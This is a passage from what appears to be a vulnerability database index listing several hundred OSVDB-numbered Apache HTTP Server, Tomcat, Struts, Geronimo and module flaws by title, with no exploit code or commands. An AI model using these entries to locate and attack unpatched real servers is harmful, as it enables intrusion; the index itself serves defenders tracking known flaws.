9511| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
9512| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
9513| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
9514| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
9515| [58667] Apache Roller Database Cleartext Passwords Disclosure
9516| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
9517| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
9518| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
9519| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
9520| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
9521| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
9522| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
9523| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
9524| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
9525| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
9526| [56984] Apache Xerces2 Java Malformed XML Input DoS
9527| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
9528| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
9529| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
9530| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
9531| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
9532| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
9533| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
9534| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
9535| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
9536| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
9537| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
9538| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
9539| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
9540| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
9541| [55056] Apache Tomcat Cross-application TLD File Manipulation
9542| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
9543| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
9544| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
9545| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
9546| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
9547| [54589] Apache Jserv Nonexistent JSP Request XSS
9548| [54122] Apache Struts s:a / s:url Tag href Element XSS
9549| [54093] Apache ActiveMQ Web Console JMS Message XSS
9550| [53932] Apache Geronimo Multiple Admin Function CSRF
9551| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
9552| [53930] Apache Geronimo /console/portal/ URI XSS
9553| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
9554| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
9555| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
9556| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
9557| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
9558| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
9559| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
9560| [53380] Apache Struts Unspecified XSS
9561| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
9562| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
9563| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
9564| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
9565| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
9566| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
9567| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
9568| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
9569| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
9570| [51151] Apache Roller Search Function q Parameter XSS
9571| [50482] PHP with Apache php_value Order Unspecified Issue
9572| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
9573| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
9574| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
9575| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
9576| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
9577| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
9578| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
9579| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
9580| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
9581| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
9582| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
9583| [47096] Oracle Weblogic Apache Connector POST Request Overflow
9584| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
9585| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
9586| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
9587| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
9588| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
9589| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
9590| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
9591| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
9592| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
9593| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
9594| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
9595| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
9596| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
9597| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
9598| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
9599| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
9600| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
9601| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
9602| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
9603| [43452] Apache Tomcat HTTP Request Smuggling
9604| [43309] Apache Geronimo LoginModule Login Method Bypass
9605| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
9606| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
9607| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
9608| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
9609| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
9610| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
9611| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
9612| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
9613| [42091] Apache Maven Site Plugin Installation Permission Weakness
9614| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
9615| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
9616| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
9617| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
9618| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
9619| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
9620| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
9621| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
9622| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
9623| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
9624| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
9625| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
9626| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
9627| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
9628| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
9629| [40262] Apache HTTP Server mod_status refresh XSS
9630| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
9631| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
9632| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
9633| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
9634| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
9635| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
9636| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
9637| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
9638| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
9639| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
9640| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
9641| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
9642| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
9643| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
9644| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
9645| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
9646| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
9647| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
9648| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
9649| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
9650| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
9651| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
9652| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
9653| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
9654| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
9655| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
9656| [36080] Apache Tomcat JSP Examples Crafted URI XSS
9657| [36079] Apache Tomcat Manager Uploaded Filename XSS
9658| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
9659| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
9660| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
9661| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
9662| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
9663| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
9664| [34881] Apache Tomcat Malformed Accept-Language Header XSS
9665| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
9666| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
9667| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
9668| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
9669| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
9670| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
9671| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
9672| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
9673| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
9674| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
9675| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
9676| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
9677| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
9678| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
9679| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
9680| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
9681| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
9682| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
9683| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
9684| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
9685| [32724] Apache mod_python _filter_read Freed Memory Disclosure
9686| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
9687| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
9688| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
9689| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
9690| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
9691| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
9692| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
9693| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
9694| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
9695| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
9696| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
9697| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
9698| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
9699| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
9700| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
9701| [24365] Apache Struts Multiple Function Error Message XSS
9702| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
9703| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
9704| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
9705| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
9706| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
9707| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
9708| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
9709| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
9710| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
9711| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
9712| [22459] Apache Geronimo Error Page XSS
9713| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
9714| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
9715| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
9716| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
9717| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
9718| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
9719| [21021] Apache Struts Error Message XSS
9720| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
9721| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
9722| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
9723| [20439] Apache Tomcat Directory Listing Saturation DoS
9724| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
9725| [20285] Apache HTTP Server Log File Control Character Injection
9726| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
9727| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
9728| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
9729| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
9730| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
9731| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
9732| [19821] Apache Tomcat Malformed Post Request Information Disclosure
9733| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
9734| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
9735| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
9736| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
9737| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
9738| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
9739| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
9740| [18233] Apache HTTP Server htdigest user Variable Overfow
9741| [17738] Apache HTTP Server HTTP Request Smuggling
9742| [16586] Apache HTTP Server Win32 GET Overflow DoS
9743| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
9744| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
9745| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
9746| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
9747| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
9748| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
9749| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
9750| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
9751| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
9752| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
9753| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
9754| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
9755| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
9756| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
9757| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
9758| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
9759| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
9760| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
9761| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
9762| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
9763| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
9764| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
9765| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
9766| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
9767| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
9768| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
9769| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
9770| [13304] Apache Tomcat realPath.jsp Path Disclosure
9771| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
9772| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
9773| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
9774| [12848] Apache HTTP Server htdigest realm Variable Overflow
9775| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
9776| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
9777| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
9778| [12557] Apache HTTP Server prefork MPM accept Error DoS
9779| [12233] Apache Tomcat MS-DOS Device Name Request DoS
9780| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
9781| [12231] Apache Tomcat web.xml Arbitrary File Access
9782| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
9783| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
9784| [12178] Apache Jakarta Lucene results.jsp XSS
9785| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
9786| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
9787| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
9788| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
9789| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
9790| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
9791| [10471] Apache Xerces-C++ XML Parser DoS
9792| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
9793| [10068] Apache HTTP Server htpasswd Local Overflow
9794| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
9795| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
9796| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
9797| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
9798| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
9799| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
9800| [9717] Apache HTTP Server mod_cookies Cookie Overflow
9801| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
9802| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
9803| [9714] Apache Authentication Module Threaded MPM DoS
9804| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
9805| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
9806| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
9807| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
9808| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
9809| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
9810| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
9811| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
9812| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
9813| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
9814| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
9815| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
9816| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
9817| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
9818| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
9819| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
9820| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
9821| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
9822| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
9823| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
9824| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
9825| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
9826| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
9827| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
9828| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
9829| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
9830| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
9831| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
9832| [9208] Apache Tomcat .jsp Encoded Newline XSS
9833| [9204] Apache Tomcat ROOT Application XSS
9834| [9203] Apache Tomcat examples Application XSS
9835| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
9836| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
9837| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
9838| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
9839| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
9840| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
9841| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
9842| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
9843| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
9844| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
9845| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
9846| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
9847| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
9848| [7611] Apache HTTP Server mod_alias Local Overflow
9849| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
9850| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
9851| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
9852| [6882] Apache mod_python Malformed Query String Variant DoS
9853| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
9854| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
9855| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
9856| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
9857| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
9858| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
9859| [5526] Apache Tomcat Long .JSP URI Path Disclosure
9860| [5278] Apache Tomcat web.xml Restriction Bypass
9861| [5051] Apache Tomcat Null Character DoS
9862| [4973] Apache Tomcat servlet Mapping XSS
9863| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
9864| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
9865| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
9866| [4568] mod_survey For Apache ENV Tags SQL Injection
9867| [4553] Apache HTTP Server ApacheBench Overflow DoS
9868| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
9869| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
9870| [4383] Apache HTTP Server Socket Race Condition DoS
9871| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
9872| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
9873| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
9874| [4231] Apache Cocoon Error Page Server Path Disclosure
9875| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
9876| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
9877| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
9878| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
9879| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
9880| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
9881| [3322] mod_php for Apache HTTP Server Process Hijack
9882| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
9883| [2885] Apache mod_python Malformed Query String DoS
9884| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
9885| [2733] Apache HTTP Server mod_rewrite Local Overflow
9886| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
9887| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
9888| [2149] Apache::Gallery Privilege Escalation
9889| [2107] Apache HTTP Server mod_ssl Host: Header XSS
9890| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
9891| [1833] Apache HTTP Server Multiple Slash GET Request DoS
9892| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
9893| [872] Apache Tomcat Multiple Default Accounts
9894| [862] Apache HTTP Server SSI Error Page XSS
9895| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
9896| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
9897| [845] Apache Tomcat MSDOS Device XSS
9898| [844] Apache Tomcat Java Servlet Error Page XSS
9899| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
9900| [838] Apache HTTP Server Chunked Encoding Remote Overflow
9901| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
9902| [775] Apache mod_python Module Importing Privilege Function Execution
9903| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
9904| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
9905| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
